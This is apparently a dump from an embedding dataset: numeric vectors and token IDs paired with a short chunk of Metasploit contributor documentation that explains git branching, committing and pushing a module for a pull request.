0.4489560127258301, 0.14162053167819977, -0.16548334062099457, -0.29837706685066223, -0.27250993251800537, -0.2599436044692993, 0.35032862424850464, 0.5522216558456421, 0.17694337666034698, -0.5310589075088501, -0.8562769889831543, 0.2897799015045166, 0.25056666135787964, 0.4772656559944153, 0.576844334602356, -0.032651495188474655, 0.1431589126586914, 0.262262761592865, -0.07081940025091171, 0.49989011883735657, 0.12587814033031464, 0.6094547510147095, 0.2940247654914856, -0.2253596931695938, -0.7865003943443298, 0.045167773962020874, -0.2688145637512207, 0.18083718419075012, 0.5587766170501709, -0.30394434928894043, -0.1728047877550125, -0.4445578157901764, 0.10049864649772644, -0.11013643443584442, -1.3242619037628174, -0.5759772062301636, -0.5284391045570374, 0.1580350548028946, 0.4577780067920685, -0.09686558693647385, 0.011690259911119938, 0.006124391220510006, 0.14313365519046783, -0.3393612504005432, -0.6892667412757874, 1.1255062818527222, 0.052685562521219254, 0.021140411496162415, -0.46109113097190857, 0.26312047243118286, -0.7481397390365601, -0.03437284007668495, -0.8440649509429932, 0.492161363363266, -0.4925388693809509, -0.5303754210472107, 0.2768095135688782, 0.21746216714382172, -0.6034174561500549, 0.4181121587753296, -0.23322322964668274, 0.2749493420124054, 0.4496575593948364, -0.9094780087471008, 0.960673451423645, 0.4934788942337036, -0.940833568572998, 0.5061339735984802, -0.029741374775767326, 0.02789638563990593, 0.04503793269395828, -0.4326437711715698, 0.5971255302429199, -0.3666333556175232, 0.029722435399889946, 0.3864606022834778, 0.43331626057624817, -0.47671180963516235, -0.17381587624549866, -0.1637444645166397, -0.6791834235191345, -0.3508593440055847, 0.14431342482566833, -0.09569036960601807, -0.7083805203437805, -0.06899936497211456, 0.0480102077126503, 0.5311331152915955, -0.1598360538482666, 0.17782509326934814, -0.9316672682762146, 0.5534943342208862, 0.3343684673309326, -0.5094721913337708, -0.04529055207967758, 0.7562693357467651, 0.34157657623291016, -0.21322152018547058, -0.1236705482006073, 0.5557526350021362, -0.4311356544494629, 0.034220073372125626, -0.742749035358429, 0.13890624046325684, -0.15443654358386993, -0.023824894800782204, 0.5030609369277954, 0.8403559923171997, 0.7229302525520325, -0.3091478645801544, -0.21222706139087677, -0.2987486720085144, -0.22093401849269867, 0.010412249714136124, -1.3408203125, -0.2854706346988678, -0.32290446758270264, -0.3888135850429535, 0.2321111559867859, -0.5549624562263489, 0.38141775131225586, -0.4722214937210083, 0.09286464005708694, 0.029561985284090042, -0.08162958920001984, -0.5542563199996948, 0.4686083197593689, 0.7587828636169434, -1.0977809429168701, -0.9259971976280212, 0.5575423836708069, -0.3568178117275238, -0.06939539313316345, -1.0544404983520508, -0.08267655223608017, 0.7530506253242493, -0.402133047580719, -0.21984809637069702, -0.6189575791358948, 0.42369863390922546, -0.14740042388439178, 0.17358200252056122, -0.12264285981655121, 0.5114486813545227, -0.6154812574386597, 0.8785049319267273, -0.6488537788391113, 0.13351142406463623, -0.5858930945396423, 0.018629444763064384, 0.48869165778160095, 0.415997713804245, -0.3715692460536957, 0.5990859866142273, 0.3390377163887024, 0.14209304749965668, 1.0683441162109375, 0.3782941401004791, 0.10723608732223511, -0.3284029960632324, 0.13875769078731537, -0.48492172360420227, 0.5152743458747864, 0.5133320689201355, 0.5907072424888611, 0.5290407538414001, 0.3504348695278168, 0.22868552803993225, -0.7712405920028687, -0.07347222417593002, 0.0639527291059494, -0.22693540155887604, -0.7094165682792664, -0.4019978642463684, -0.10975952446460724, -0.2097322940826416, -0.4522579312324524, 0.020477114245295525, 0.20852349698543549, -0.4561203420162201, 0.03456434607505798, -0.19297054409980774, 0.03402037173509598, 0.44638243317604065, -0.3887113034725189, 0.6506710648536682, 0.4027688801288605, 0.017401335760951042, -0.007955947890877724, 0.36972570419311523, -0.7705152034759521, 0.5933095812797546, 1.072396159172058, 0.19491270184516907, -0.1522054821252823, 0.5422770977020264, 0.5674353241920471, 0.5624149441719055, -0.03326474502682686, -0.017191220074892044, 0.17406271398067474, 0.2750577926635742, -0.4541848301887512, -0.15170077979564667, -0.5493576526641846, 0.23881711065769196, -0.07184708118438721, 0.20384487509727478, 0.5480008125305176, -0.32792821526527405, 0.2774115204811096, -0.7300904393196106, 0.607272744178772, 0.3338955044746399, -0.2744283080101013, 0.7102964520454407, -0.31135666370391846, -1.2390170097351074, 0.3130328357219696, 0.1543699949979782, 1.1282343864440918, 0.0761154517531395, 0.7176482677459717, -0.1979684829711914, 0.8251556158065796, 0.4819951355457306, -0.1408708095550537, -0.00184413674287498, 0.14481046795845032, 0.13302502036094666, -0.7425942420959473, 0.47496917843818665, -0.499285489320755, 0.43935900926589966, -0.013799873180687428, 0.07335978001356125, -0.10957016795873642, 0.2755869925022125, -1.119903326034546, -0.5572109818458557, 0.27729377150535583, -0.2901832163333893, -0.7603067755699158, -0.23967961966991425, 0.27359598875045776, -0.011146333068609238, 0.2927739918231964, -0.025756241753697395, -0.06322895735502243, -0.6550400257110596, -0.18896295130252838, -0.5638644099235535, 0.980380654335022, 0.3196871280670166, -0.592583954334259, -0.37266799807548523, -0.7766706347465515, -0.017678244039416313, -0.3768412172794342, -1.0426585674285889, -0.4517263174057007, 0.7598194479942322, -0.20493066310882568, 0.7169139385223389, 0.3205704689025879, -0.7548911571502686, -0.4249744415283203, 0.5392606258392334, 0.8512979745864868, 0.19249996542930603, 0.8722522258758545, 0.22704799473285675, 0.09053658694028854, 0.34696677327156067, -0.06287217140197754, 0.8741135001182556, -0.24674135446548462, -0.1330517679452896, 0.0674498975276947, -0.3584969639778137, -0.1146274209022522, -0.913295567035675, -0.5556473135948181, 0.4772588908672333, 0.24388758838176727, 0.026752250269055367, -0.8720088601112366, -0.6435238718986511, -1.0251983404159546, -0.6918572783470154, -0.8438035845756531, 0.8933423757553101, 0.0477604866027832, 0.421840101480484, 0.6071080565452576, -0.9914464354515076, 4.148556232452393, 0.7442766427993774, 0.1947784274816513, -0.11332976073026657, 0.5009461641311646, 0.9159034490585327, 0.5861443877220154, -0.39449837803840637, 0.11109588295221329, -0.0378655381500721, 0.34790360927581787, -0.8887184262275696, 0.37316882610321045, 1.0862237215042114, 0.28095510601997375, 0.24389484524726868, -0.4170674681663513, 0.2750844955444336, -0.456108421087265, -1.117077350616455, -0.8757987022399902, 0.31072527170181274, -0.529556155204773, 0.5717424154281616, 0.24808157980442047, 0.23422755300998688, 0.21543267369270325, -0.8265876173973083, -0.29320675134658813, 0.01026951428502798, 0.3576452434062958, -0.19577167928218842, 0.24268491566181183, -0.10757286101579666, 0.045736491680145264, 0.07961586862802505, 0.13634935021400452, -0.424282044172287, -0.9146895408630371, -0.42097124457359314, 0.02730400860309601, -0.26716434955596924, -0.662104070186615, -0.2803248167037964, 0.5562955141067505, 0.5073298215866089, -0.36920687556266785, 0.6671544313430786, 0.268229216337204, -1.1890238523483276, 0.23451535403728485, 0.8134720921516418, 0.4115021824836731, 0.30871260166168213, -0.7185052633285522, 0.4286791980266571, 0.6868672370910645, -0.08755262941122055, -0.06069598346948624, -0.1855626106262207, 0.3776237964630127, -0.2972453832626343, 0.6684878468513489, 0.6440358757972717, -0.6023963689804077, 0.8889930844306946, 0.21221794188022614, 0.2885686755180359, -0.18747882544994354, -0.10101553052663803, -0.5762600302696228, 0.29412737488746643, -0.09171704947948456, -0.9364756941795349, 1.371587872505188, -0.1378333419561386, -0.17832307517528534, -0.09773972630500793, 0.5637711882591248, -0.40191829204559326, -0.6178287863731384, -0.6975626349449158, -0.8104503154754639, 0.2017749547958374, 0.27040010690689087, 0.7021008133888245, -0.054938413202762604, -0.7018323540687561, -0.0045893010683357716, 0.3998298943042755, 0.19727720320224762, 0.9992965459823608, -0.5574697256088257, 0.5242297053337097, 0.20337486267089844 ]
[ 1521, 1055, 3120, 1998, 3275, 2477, 2041, 1012, 1998, 3404, 2033, 1010, 2087, 1997, 2068, 2123, 1521, 1056, 1012, 1996, 3166, 2492, 2003, 2073, 2017, 2404, 2115, 2171, 1012, 1996, 4289, 2323, 2022, 1523, 2171, 1000, 1012, 2065, 2017, 2215, 2000, 2031, 2115, 10474, 5047, 2045, 1010, 2681, 2009, 2004, 1037, 7615, 1010, 2005, 2742, 1024, 1000, 2171, 1001, 5047, 1000, 1996, 4132, 2492, 7127, 2054, 7248, 2024, 3569, 1010, 2005, 2742, 1024, 2663, 1010, 11603, 1010, 9808, 2595, 1010, 19998, 1010, 18667, 2094, 1012, 1996, 5219, 13874, 2015, 2492, 2323, 2022, 2593, 8316, 28139, 3334, 1010, 2030, 5806, 1012, 2017, 2323, 3046, 2000, 2490, 2119, 1012, 1998, 2633, 1010, 1996, 2448, 4118, 2003, 2066, 2115, 2364, 4118, 1012, 2707, 3015, 2115, 3642, 2045, 1012, 3937, 21025, 2102, 10954, 11368, 3022, 24759, 28100, 2053, 2936, 3594, 17917, 2078, 2005, 3120, 3642, 2968, 1010, 2612, 2057, 2224, 21025, 2102, 1010, 2061, 4209, 2070, 12225, 2007, 21025, 2102, 2175, 1037, 2146, 2126, 1012, 2057, 1521, 2128, 2025, 2182, 2000, 8835, 2017, 2055, 2129, 12476, 21025, 2102, 2003, 1010, 2057, 2113, 2009, 2038, 1037, 4083, 7774, 1998, 2009, 1521, 1055, 2025, 11341, 2000, 2424, 2047, 5198, 2437, 12051, 1012, 2296, 2320, 1037, 2096, 1010, 2115, 21025, 2102, 1523, 7385, 1524, 2097, 5926, 1999, 1010, 1998, 2057, 3305, 1012, 2174, 1010, 2009, 1521, 1055, 2590, 2005, 2017, 2000, 2202, 5056, 1997, 23346, 1012, 2296, 2051, 2017, 2191, 1037, 11336, 1010, 2030, 2191, 2070, 3431, 2000, 4493, 3642, 1010, 2017, 2323, 2025, 2079, 2061, 2006, 1996, 12398, 3040, 3589, 1012, 2339, 1029, 2138, 2043, 2017, 2079, 1037, 5796, 11263, 17299, 3686, 1010, 2029, 2003, 18804, 13102, 4135, 4183, 1521, 1055, 9710, 2005, 2039, 16616, 2115, 22409, 1010, 2009, 2097, 2079, 1037, 21025, 2102, 25141, 2077, 16468, 1996, 3431, 1010, 1998, 2035, 2115, 3642, 2175, 9061, 1011, 9061, 1012, 2178, 6707, 2111, 7166, 2000, 2079, 2003, 2031, 2035, 1996, 3431, 2006, 3040, 2077, 12040, 3436, 1037, 4139, 5227, 1012, 2023, 2003, 1037, 2919, 2801, 1010, 2138, 2087, 3497, 2017, 1521, 2128, 12040, 3436, 2060, 10231, 2017, 2123, 1521, 1056, 13566, 2000, 2689, 1010, 1998, 1013, 2030, 2017, 1521, 2128, 2763, 4851, 2149, 2000, 13590, 2060, 14203, 10797, 2381, 2043, 2045, 2069, 3791, 2000, 2022, 2028, 10797, 1012, 4283, 2005, 8020, 2115, 11336, 2000, 1996, 2451, 1010, 2021, 2053, 4283, 2000, 2115, 4689, 10797, 2381, 1012, 2061, 2004, 1037, 10427, 1010, 2043, 2017, 2215, 2000, 2191, 2242, 2047, 1010, 2030, 2689, 2242, 1010, 4088, 2007, 1037, 2047, 3589, 2008, 1521, 1055, 2039, 2000, 3058, 2000, 3040, 1012, 2034, 2125, 1010, 2191, 2469, 2017, 1521, 2128, 2006, 3040, 1012, 2065, 2017, 2079, 1037, 21025, 2102, 3570, 2009, 2097, 2425, 2017, 2054, 3589, 2017, 1521, 2128, 2747, 2006, 1024, 1002, 21025, 2102, 3570, 1001, 2006, 3589, 13909, 1011, 3040, 2498, 2000, 10797, 1010, 2551, 14176, 4550, 7929, 1010, 2085, 2079, 1037, 21025, 2102, 4139, 2000, 8816, 1996, 6745, 3431, 2013, 18804, 13102, 4135, 4183, 1024, 1002, 21025, 2102, 4139, 2525, 2039, 1011, 2000, 1011, 3058, 1012, 2012, 2023, 2391, 1010, 2017, 1521, 2128, 3201, 2000, 2707, 1037, 2047, 3589, 1012, 1999 ]
metasploit
111.txt
4
this case, we ’ ll name our new branch β€œ my _ awesome _ branch ” : $ git checkout - b my _ awesome _ module switched to a new branch'my _ awesome _ module'and then you can go ahead and add that module. make sure it ’ s in the appropriate path : $ git add [ module path ] when you decide to save the changes, commit ( if there ’ s only one module, you can do git commit - a too so you don ’ t have to type the module path. note - a really means everything ) : $ git commit [ module path ] when you ’ re done, push your changes, which will upload your code to your remote branch β€œ my _ awesome _ branch ”. you must push your changes in order to submit the pull request, or share it with others on the internet. $ git push origin my _ awesome _ branch referencesurl / tree / master / modules / posturl / tree / master / lib / msf / core / post [SEP]
[ 0.6334497928619385, 0.2756275236606598, -0.6724817752838135, -0.31973257660865784, -0.5785007476806641, -1.1030619144439697, 0.9487905502319336, 0.21486815810203552, 0.3248215913772583, 1.1777704954147339, 0.13944268226623535, 0.1831451654434204, 0.4472406506538391, 0.1683763861656189, -0.21888487040996552, -0.2382485568523407, 0.07016973942518234, -0.6093127727508545, -1.5068950653076172, 0.259225457906723, 0.14914120733737946, -0.5268875956535339, -1.1304759979248047, 0.13280411064624786, -0.43393927812576294, 0.7585533857345581, 0.43830037117004395, -0.37392792105674744, 1.1713380813598633, 0.8222874402999878, -0.6807662844657898, 0.0058446223847568035, -0.33351513743400574, -0.5142108201980591, -0.0780574381351471, -0.25446364283561707, -0.24835895001888275, -0.6196836829185486, -0.7573162913322449, -0.7897063493728638, -0.45958489179611206, -0.43751123547554016, 0.6908804178237915, -0.770941436290741, -1.7115176916122437, 0.46749934554100037, 0.38943570852279663, -0.3809216022491455, 0.7471811771392822, -0.7217480540275574, 0.16653680801391602, 1.5290124416351318, -0.06485036760568619, 0.29542967677116394, -0.4174101650714874, 0.610198974609375, -0.21565160155296326, -0.011462012305855751, -0.1748022735118866, 0.7014821171760559, -0.015243476256728172, 0.3228321969509125, 0.15609727799892426, -0.7201012372970581, 0.10354230552911758, 0.6366003751754761, -0.45303261280059814, -0.17640694975852966, 0.3334733545780182, -0.29294654726982117, -0.18575525283813477, -0.10195925086736679, -0.06593389809131622, -0.7570136785507202, -0.22531728446483612, 0.028181379660964012, 0.8676925301551819, 0.3727850019931793, -0.3138274848461151, 0.6981368660926819, 0.12045156955718994, 0.638698935508728, 0.035351794213056564, 0.4706118404865265, -0.6045026183128357, -0.34487980604171753, 0.2262953668832779, -0.3408482074737549, -0.7900310754776001, -0.237748384475708, 0.33774545788764954, 0.6134981513023376, 0.2428274154663086, -0.1449294239282608, 0.5793249011039734, 0.7487189769744873, -0.8844647407531738, -0.1392667144536972, 0.01068281289190054, 0.20094357430934906, 0.34038057923316956, 0.5438207983970642, 0.2776358127593994, 0.08877267688512802, 0.16156581044197083, -0.11668968945741653, 0.2903113067150116, -0.26945555210113525, 0.32976847887039185, -0.2962989807128906, 0.06952343136072159, -0.39119523763656616, 0.04305539280176163, -0.10338135063648224, -0.48076802492141724, -0.3113116919994354, -0.11382371932268143, 0.9006867408752441, -1.1130834817886353, -0.4941902458667755, 0.9368394017219543, -0.17861753702163696, -0.13558612763881683, -0.4379855692386627, -0.18308277428150177, 0.21198342740535736, 0.15990005433559418, 0.8347464203834534, -0.47203513979911804, 0.3822413682937622, -0.2801312506198883, -0.08867307752370834, -0.5254243612289429, 0.6219542622566223, -0.026470713317394257, 0.21924398839473724, -0.8723474144935608, 0.03503921627998352, 0.23196421563625336, -0.5231354236602783, -0.1073099747300148, 0.13193082809448242, 0.30917465686798096, 0.7337475419044495, 0.9875162243843079, -0.15820415318012238, -0.030686555430293083, -0.44930553436279297, -0.3724994659423828, 0.2482014149427414, 0.08340990543365479, -0.4636189341545105, -0.48037517070770264, 0.08008131384849548, -0.02215365134179592, 0.9947179555892944, -0.4980698227882385, 0.330132395029068, 0.14297467470169067, 1.0309029817581177, -0.1221812516450882, 1.0071969032287598, 0.1713973581790924, 0.9536578059196472, -0.31620824337005615, 1.121219515800476, -0.4064033031463623, -0.5066080093383789, -0.9006319642066956, 0.00547675509005785, 0.3312559425830841, -0.3303261995315552, -0.521841824054718, -0.2948490083217621, 1.4005956649780273, 0.6707457900047302, 0.3777606189250946, 0.27344393730163574, 0.12802596390247345, 0.41253453493118286, -0.023370737209916115, 0.8356390595436096, 0.7376195788383484, 0.4038022458553314, -0.21554729342460632, 0.848804771900177, -0.05988094210624695, 0.18499651551246643, -0.17625857889652252, -0.5964176058769226, -0.4378910958766937, 0.3899343013763428, -0.2703295052051544, 0.8840153813362122, -0.6109960675239563, -0.19221001863479614, 0.22504495084285736, 0.04036610201001167, 0.24454057216644287, 0.10097803175449371, -1.083396315574646, 0.13715091347694397, 0.23197494447231293, 0.47425198554992676, -0.7810339331626892, -1.0402809381484985, 0.011078775860369205, 0.4303094446659088, -0.5360214114189148, -0.49418702721595764, 0.6868717670440674, -0.2658010423183441, -0.6687793135643005, 0.36312335729599, -0.04643598943948746, -1.114332675933838, -0.3189847469329834, 0.24283617734909058, 0.08961719274520874, -0.39677995443344116, 0.7065811157226562, 0.7032061815261841, 0.5291784405708313, 0.33099889755249023, -0.4299015402793884, 0.7211342453956604, -0.13572129607200623, 0.8766191005706787, -0.4820019602775574, -0.18493548035621643, -0.09495288878679276, 0.3165111243724823, 0.1911633014678955, 1.110836386680603, 0.16245776414871216, 0.06391508877277374, 0.2453620880842209, 1.2297359704971313, -0.0447029285132885, 0.2123274952173233, 0.6689848303794861, -0.6765223145484924, 0.24672676622867584, -0.008486309088766575, -0.6047332286834717, -0.06677019596099854, 0.35720837116241455, -0.4049351215362549, 0.032175954431295395, 0.4166373312473297, -0.5977308750152588, 1.0375293493270874, 0.15875361859798431, -0.49656668305397034, -0.17959590256214142, -0.5240110158920288, 0.11160244047641754, 0.39931952953338623, -0.8366279602050781, 0.11838914453983307, 0.1918296217918396, 0.33662891387939453, -0.5904528498649597, 0.756598174571991, -0.17222464084625244, 0.7378167510032654, -0.4177075922489166, -0.18684040009975433, -0.3845580816268921, -0.9855841398239136, -0.10786164551973343, -0.12437380105257034, -1.0106130838394165, -0.4453224241733551, -0.7824141383171082, 0.486551433801651, 0.5171213746070862, -0.4136934280395508, 0.24437546730041504, -0.43143895268440247, 0.489204466342926, -0.28188493847846985, 0.16519403457641602, 0.21894973516464233, -0.1906306892633438, 0.15866422653198242, -1.0064677000045776, 0.4297170639038086, -0.6228730082511902, 1.5684802532196045, -0.5044668912887573, 0.23326562345027924, -0.07630719989538193, 0.28409236669540405, 0.31087976694107056, 0.19014619290828705, -0.10261443257331848, -0.24406583607196808, -1.3878428936004639, -0.14573150873184204, -0.33497339487075806, -0.5109035968780518, 0.3410678803920746, 0.2355615198612213, -0.00076249276753515, 0.3415386974811554, -0.08716694265604019, -0.4469425082206726, 1.0652379989624023, 0.7247581481933594, -0.38993367552757263, 0.08198665082454681, -0.45220816135406494, -0.30082055926322937, -0.7243333458900452, 0.25195616483688354, 0.42624980211257935, 0.5327768325805664, -0.28215911984443665, -0.2197444587945938, -0.6607525944709778, -0.10535722225904465, 0.4237962067127228, -0.07831402868032455, 0.6146267056465149, 0.8384604454040527, 0.03064526803791523, -1.2658683061599731, 0.37511807680130005, -0.20990204811096191, -0.4777144193649292, -0.7700268030166626, -0.32855772972106934, 0.4518543481826782, 0.0867760181427002, 0.24759913980960846, -0.136182963848114, 0.17582100629806519, 0.2647392451763153, 0.3071706295013428, 0.45738106966018677, -0.21607504785060883, 1.070419192314148, 0.137711763381958, 0.43462517857551575, -0.6556282043457031, -0.1107364073395729, -0.5433310270309448, -0.8410390615463257, -0.0426732674241066, 0.3384796380996704, 0.18576973676681519, 0.057207126170396805, 1.0984406471252441, 0.5767187476158142, 0.5849478244781494, -0.36240527033805847, -0.28227004408836365, 0.06339796632528305, 0.35929954051971436, 0.6971093416213989, 1.0396674871444702, -0.020294055342674255, 0.07216963171958923, -0.6392025351524353, -0.8867853879928589, -0.08131295442581177, 0.4158492088317871, 0.06590954959392548, -0.6742099523544312, 0.7821623682975769, -0.2969822585582733, -0.31209802627563477, -0.16867287456989288, -0.43890026211738586, -0.2187643051147461, 0.47712162137031555, 0.12637029588222504, 0.4703652858734131, 0.32549920678138733, -1.1421209573745728, 0.3693069815635681, -0.18159784376621246, 0.2943599820137024, 0.5503706932067871, -0.16001172363758087, -0.8208489418029785, 0.22289763391017914, -0.2104043960571289, -0.02349681966006756, 0.32160115242004395, -0.747170090675354, 0.16946062445640564, -0.8131152391433716, -0.15728570520877838, -0.42897891998291016, 1.0232206583023071, 0.26944252848625183, 0.9569552540779114, -0.4870114326477051, -0.08593353629112244, 0.3590658903121948, -0.46730777621269226, 0.39847904443740845, 0.4502863585948944, -0.03834844380617142, -0.7963366508483887, 0.7180467844009399, 1.3119711875915527, 0.43554097414016724, -0.02238251082599163, 0.2757279574871063, 0.6495161056518555, 0.4372367262840271, -0.6138119697570801, -0.09162428975105286, -1.1973627805709839, -0.07808320224285126, 0.22321146726608276, 0.2872157096862793, -0.7790457010269165, -0.271661639213562, -0.7769253849983215, 0.0979708880186081, 0.6045047044754028, -1.0408854484558105, 0.07727911323308945, -0.4225212037563324, -0.3942020833492279, 0.6714383959770203, -0.7330617904663086, -0.8621943593025208, 0.4520571231842041, -0.557363748550415, -0.9019967913627625, 0.706419050693512, 0.5961411595344543, -0.19778260588645935, 0.4876408278942108, -0.5276323556900024, 0.16328679025173187, 0.20673798024654388, -0.8913046717643738, -0.6680657863616943, -0.4413202404975891, 0.2519254982471466, 0.22603866457939148, 0.39375731348991394, -0.14179815351963043, -0.3722532391548157, 0.5162827372550964, -0.5261530876159668, 0.4870702028274536, -0.35763102769851685, 0.6119279861450195, -0.5136411786079407, 0.21678736805915833, 0.3546055555343628, 0.11436601728200912, 0.3019283711910248, 0.44264817237854004, 0.15759508311748505, 0.3936123847961426, -0.9439190030097961, -0.49833646416664124, -0.08246739208698273, 0.3528493344783783, -0.5286898016929626, 0.9634442925453186, 0.06174203008413315, -0.8258201479911804, 0.5029482245445251, 0.5632873177528381, -0.1394907534122467, 0.6797747611999512, -1.1804924011230469, 0.7989994287490845, 0.49156585335731506, -0.0808790922164917, 0.45427677035331726, -1.092876672744751, -0.053873710334300995, 0.02738240174949169, 0.1449917107820511, -0.8918014168739319, -0.9560177326202393, -0.33650097250938416, 0.33477941155433655, -0.04287516698241234, 0.7194712162017822, -0.002051600255072117, -0.3284949064254761, -0.2633001506328583, -0.3478909432888031, 0.14626461267471313, -0.5261772274971008, -0.9127768874168396, -0.04020753502845764, 0.6380351185798645, -0.4027920663356781, 0.19494593143463135, 0.26324889063835144, -0.7254125475883484, 0.1277308315038681, -0.4547993838787079, 0.18204444646835327, -0.6736018061637878, -0.2906950116157532, 0.03938112407922745, 0.3246850073337555, -0.9460316896438599, 0.25839242339134216, -0.3819991648197174, 0.20140406489372253, 0.6783373355865479, 0.08668888360261917, 0.03414752334356308, -0.05867261439561844, -0.4846106469631195, 1.1751744747161865, -0.33413803577423096, -1.0654621124267578, -0.2845676839351654, -0.30651742219924927, 0.3645141124725342, 0.8732134699821472, 0.11894599348306656, -0.8245944976806641, -0.5872291922569275, -0.6474343538284302, 0.2731814384460449, -1.1500120162963867, -0.252887487411499, -0.44809290766716003, -0.7687569260597229, -0.2710174322128296, 1.010365605354309, 0.6426085233688354, -0.8169273138046265, -0.10198711603879929, -0.2546386420726776, 0.8167492747306824, -0.5519730448722839, 0.18876220285892487, 0.2113872617483139, -0.20653901994228363, -0.49719688296318054, 0.7912988066673279, -0.11296889185905457, 0.3063476085662842, -0.8981589674949646, 0.6315534114837646, 0.02380201779305935, 0.34321272373199463, -0.2857838273048401, -0.19809888303279877, -0.1527286171913147, 0.15737174451351166, 0.12125974148511887, 0.3597104847431183, -0.37589114904403687, 0.16368459165096283, 0.08536994457244873, 0.7152799367904663, -0.5382887721061707, 0.01137463003396988, -0.021333130076527596, 0.4519121050834656, 0.460864782333374, -0.40514156222343445, 0.5866664052009583, -0.13138988614082336, 0.7633201479911804, -0.10694046318531036, -0.18774215877056122, 0.12536926567554474, 0.47693508863449097, -0.7211909294128418, -0.2864867150783539, 0.02875686064362526, -0.29853615164756775, 0.4614240527153015, -0.004340261220932007, 0.304945170879364, 0.6101115345954895, -0.07812538743019104, 0.29429516196250916, 1.0408624410629272, 0.3143256604671478, 0.9093582630157471, -1.160157322883606, 0.5859742164611816, 0.6164450645446777, 0.0348074734210968, 0.48123085498809814, 0.7227540612220764, -0.7015127539634705, 0.061659425497055054, 0.23691599071025848, -0.5633708834648132, -0.45280277729034424, 0.3918173313140869, 0.5018573999404907, 0.1361829787492752, 0.32923635840415955, -0.8242493867874146, -0.8258457779884338, -0.09786367416381836, 0.9057230949401855, 0.49137353897094727, -0.16338835656642914, 0.469361811876297, 0.5496362447738647, 0.33127251267433167, -0.3745974004268646, -0.22237256169319153, -0.4474811553955078, 0.17751380801200867, 0.4037000238895416, 0.6521794199943542, 0.09943588078022003, 0.2712382674217224, 0.3458240032196045, -0.6997469663619995, -1.2270371913909912, -1.1904940605163574, 0.1685953140258789, -0.17205482721328735, -0.2643105387687683, -0.578151285648346, 0.4574269652366638, 0.7170366644859314, 0.9686004519462585, 0.44735825061798096, -0.7809351682662964, -0.2863187789916992, -0.3888026177883148, -1.2337814569473267, 0.3801998198032379, 0.06210365146398544, 0.40476319193840027, -0.4512134790420532, -0.8576813340187073, -1.3099699020385742, -0.17867779731750488, -1.1996376514434814, 0.18396727740764618, 1.1444462537765503, 0.5516684651374817, -0.3367566764354706, 0.4836330711841583, 0.28228849172592163, 0.3588777184486389, 0.5668407082557678, 0.2557365596294403, 0.7359505295753479, -0.6248842477798462, -0.5252069234848022, 0.48974114656448364, -0.03761783614754677, -0.6831842064857483, 0.12446794658899307, -0.21530400216579437, 0.08639007061719894, 0.6794335246086121, -0.13210633397102356, 0.05383320525288582, -0.9429055452346802, 0.4510049819946289, -0.7585723400115967, -0.11496931314468384, -0.0773073136806488, 0.03565685451030731, -0.04426092281937599, -0.013856690376996994, -0.09763077646493912, -1.01463782787323, -0.2855098247528076, 0.825250506401062, -0.17256377637386322, -0.5090503692626953, -0.7427853345870972, -0.0827823132276535, -0.7001035213470459, -0.9486452341079712, -0.9418222308158875, -0.09713132679462433, -0.5844550132751465, -0.036748841404914856, -0.08365345746278763, -0.20592767000198364, 0.0892208069562912, 0.20887857675552368, 0.25721386075019836, 0.7383551001548767, -0.29087555408477783, -0.08181742578744888, 0.27346473932266235, 0.30387619137763977, -0.1252758651971817, 0.5000016093254089, -0.12353534251451492, -0.5379328727722168, 1.0850275754928589, -0.11705878376960754, -0.06967811286449432, -0.04365736246109009, 0.007615961134433746, 0.10182047635316849, -0.2550315856933594, -1.102087378501892, 0.2302790880203247, 0.02945670485496521, -0.4139096140861511, -0.2298707216978073, -0.15873967111110687, -0.010559353977441788, -0.1411670744419098, -0.30089202523231506, -0.5651801824569702, 0.3893715441226959, 0.3809387683868408, -0.12891919910907745, 0.11891701072454453, 0.7966225147247314, 0.9097386002540588, 0.339555948972702, -0.5371831059455872, 1.020782470703125, -0.12282825261354446, -0.16985002160072327, 0.0754966288805008, 0.996039628982544, -0.0817064642906189, 0.541828453540802, -0.17202693223953247, 0.4243849515914917, -0.5530291795730591, 0.061348769813776016, 0.36679160594940186, 0.4966915547847748, 0.7567762136459351, -0.36863842606544495, -0.45013442635536194, -0.609717607498169, 0.4597453474998474, -0.018722744658589363, -0.831702470779419, -0.4036523997783661, 0.3538717031478882, -0.47110193967819214, 0.4204716682434082, -0.25838378071784973, 0.28084930777549744, -0.06919127702713013, -0.1598084568977356, 0.0882469043135643, -0.47999805212020874, -0.6154394745826721, 0.643778920173645, 0.5992584824562073, -0.8447532057762146, 0.06570561230182648, 0.533767580986023, 0.14067091047763824, 0.32684847712516785, -0.5294914245605469, -0.3480164110660553, 0.8624870181083679, 0.038033660501241684, -0.8014881014823914, -0.2574821710586548, -0.5162345767021179, -0.23605965077877045, 0.23299726843833923, -0.6469841003417969, 0.044452011585235596, -0.8626415729522705, 0.2549336552619934, -0.8527817726135254, 0.03198491781949997, -0.9076927900314331, 0.5384107828140259, 0.19633042812347412, 0.3673746883869171, 0.010233941487967968, 0.4720824360847473, 0.0037208155263215303, 0.48427730798721313, 0.5931797027587891, -0.2999110817909241, 0.3476141393184662, -0.23695145547389984, -0.09325557202100754, 0.5591544508934021, 0.5740016102790833, 0.8464367985725403, 0.8347906470298767, 0.19911374151706696, 0.4688155949115753, -0.37060120701789856, 0.37178051471710205, -0.4653458595275879, 0.20148511230945587, 0.0575442910194397, -0.5839059352874756, 0.04013679549098015, 0.2304709255695343, -0.18832719326019287, -0.4817896783351898, -0.18077415227890015, 0.16067542135715485, -0.171027272939682, 0.3376083970069885, 0.14781956374645233, -0.3044561445713043, 0.36433136463165283, -0.6869614720344543, -0.02080443874001503, 0.3292468190193176, -0.6733975410461426, 0.8502612709999084, 0.25890403985977173, -0.09582021087408066, 0.590663492679596, 0.6310200691223145, 0.0332762710750103, 0.1683548539876938, 0.21901096403598785, 0.5268673300743103, 0.4139292538166046, -0.4631800353527069, 0.3020397126674652, -0.16372831165790558, 0.15914182364940643, -0.5256969928741455, 0.09826339781284332, -0.205582395195961, -0.21515822410583496, 0.03696554899215698, 0.09553688019514084, 0.28824537992477417, -0.6286439895629883, 0.02412208542227745, -1.3309038877487183, -0.042869456112384796, -0.32527005672454834, 0.5280199646949768, 0.44038257002830505, -0.1694837063550949, -1.3622874021530151, 0.6103944778442383, 0.16740182042121887, 0.22924071550369263, 0.7227728366851807, 1.1787537336349487, -0.2425263226032257, 0.6800015568733215, 0.43024566769599915, -0.32142993807792664, -0.08200164884328842, -0.03215991333127022, -0.055041566491127014, -0.5498132705688477, 0.8672946691513062, -0.2121337503194809, 0.11244937032461166, -0.38428795337677, -0.4357072114944458, 0.6614927053451538, 0.15156115591526031, -0.4660952389240265, -1.111302375793457, 0.3802543878555298, -0.19816574454307556, -1.088918924331665, -0.25554323196411133, 0.8369213938713074, 0.33481162786483765, 